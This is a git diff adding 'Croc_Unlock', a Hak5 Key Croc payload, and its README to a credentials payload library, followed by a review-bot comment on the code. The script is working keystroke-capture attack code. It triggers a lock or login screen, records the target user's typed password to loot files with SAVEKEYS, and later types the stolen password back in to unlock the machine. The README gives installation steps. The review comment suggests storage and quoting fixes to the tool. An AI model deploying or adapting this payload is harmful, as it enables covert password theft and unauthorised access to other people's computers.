diff --git a/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
new file mode 100644
index 0000000..e1e2494
--- /dev/null
+++ b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
@@ -0,0 +1,95 @@
+# Title: Croc_Unlock
+# Description: Save target passwd with SAVEKEYS command by pressing GUI-l or CONTROL-ALT-F3
+# Log in with typing crocunlock, save at /loot/Croc_Pot/Croc_unlock.txt.filtered and /tools/Croc_Pot/Croc_unlock.txt.filtered
+# Author: Spywill
+# Version: 2.2
+# Category: Key Croc
+# Props: RootJunky
+
+MATCH (crocunlock|GUI-l|CONTROL-ALT-F3)
+
+UNLOCK_TMP="/tmp/unlock_Count.txt"
+
+CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
+for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
+
+UNLOCK_FILE() {
+ until [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; do
+ :
+ done
+ sed -i '/\b'$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)'\b/!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered
+ LED G
+ Q DELAY 1000
+ LED OFF
+}
+
+UNLOCK_COUNT() {
+ if [ -f $UNLOCK_TMP ]; then
+ i=$(sed -n 1p $UNLOCK_TMP)
+ echo "$(( $i + 1 ))" > $UNLOCK_TMP
+ else
+ echo "$(( i++ ))" > $UNLOCK_TMP
+ if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+ sed -i '/\b'$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)'\b/!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered
+ cat /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered >> /root/udisk/loot/Croc_Pot/Croc_unlock.txt.filtered
+ rm -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered /root/udisk/tools/Croc_Pot/Croc_unlock.txt
+ fi
+ fi
+ Q DELAY 1000
+}
+
+RELOAD() {
+ killall -9 bash
+ killall -9 python
+ sleep 1
+ RELOAD_PAYLOADS
+}
+
+case $LOOT in
+ "GUI-l" | "CONTROL-ALT-F3")
+ UNLOCK_COUNT
+ if [ "$(sed -n 1p $UNLOCK_TMP)" -gt "0" ]; then
+ UNLOCK_FILE
+ RELOAD
+ elif [ "$(sed -n 1p $UNLOCK_TMP)" -eq "0" ]; then
+ if [ "$LOOT" = "CONTROL-ALT-F3" ]; then
+ if [ -f /root/udisk/tools/Croc_Pot/Croc_OS.txt ]; then
+ if [ "$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)" = "raspberrypi" ]; then
+ Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)"
+ Q ENTER
+ Q DELAY 1000
+ fi
+ fi
+ elif [ "$LOOT" = "GUI-l" ]; then
+ Q BACKSPACE
+ fi
+SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
+ LED ATTACK
+ UNLOCK_FILE
+ fi
+;;
+ crocunlock)
+ if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+ UNLOCK_FILE
+ LED SETUP
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q BACKSPACE
+ Q DELAY 1000
+ Q STRING "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)"
+ Q ENTER
+ LED OFF
+ RELOAD
+ else
+ LED R
+ RELOAD
+ fi
+;;
+esac
diff --git a/payloads/library/credentials/Croc_Unlock/README.md b/payloads/library/credentials/Croc_Unlock/README.md
new file mode 100644
index 0000000..8fa195a
--- /dev/null
+++ b/payloads/library/credentials/Croc_Unlock/README.md
@@ -0,0 +1,19 @@
+# Croc_Unlock
+## INTRODUCTION :
+* This project is developed for the HAK5 KeyCroc
+ - Pressing **GUI-l** will open windows / linux parrot OS login screen and wait for user to enter passwd with SAVEKEYS command
+ - Pressing **CONTROL-ALT-F3** will open Raspberry pi 4 terminal login screen and wait for user to enter passwd with SAVEKEYS command
+ - Type in **crocunlock** at the target login screen will delete crocunlock characters and enter user passwd
+ - Payload will save passwd at /tools/Croc_Pot/Croc_unlock.txt.filtered, this payload was design to help with Croc_Pot
+ - Old passwd will be save at /loot/Croc_Pot/Croc_unlock.txt.filtered
+
+ - **NOTE:** This payload is relying on the ENTER key to be press after user has enter passwd
+
+* **TESTED ON**
+ - Windows 10
+ - Raspberry pi 4
+ - linux parrot OS
+
+ ## INSTALLATION :
+ - Will need to enter arming mode on your keycroc to install file.
+ - File is called **CrocUnlock.txt** Place this in the KeyCroc **payload folder**.
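Review bot: In Croc_Unlock.txt the captured password is written in cleartext to `/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered`, and `UNLOCK_COUNT` appends earlier captures to the copy under `/root/udisk/loot/Croc_Pot/`, which no code path in this file removes. The header comment names the two paths but not that the contents are unprotected or how long they persist; I would add `# NOTE: credentials are kept in cleartext under /root/udisk; delete both Croc_unlock.txt.filtered files once testing ends`. Both `sed -i` calls (in `UNLOCK_FILE` and `UNLOCK_COUNT`) also paste the first line of the capture file unquoted into the sed script, so keystroke-derived text is parsed as sed syntax on the device instead of being handled as data. The README.md added in the same commit would benefit from the same storage note.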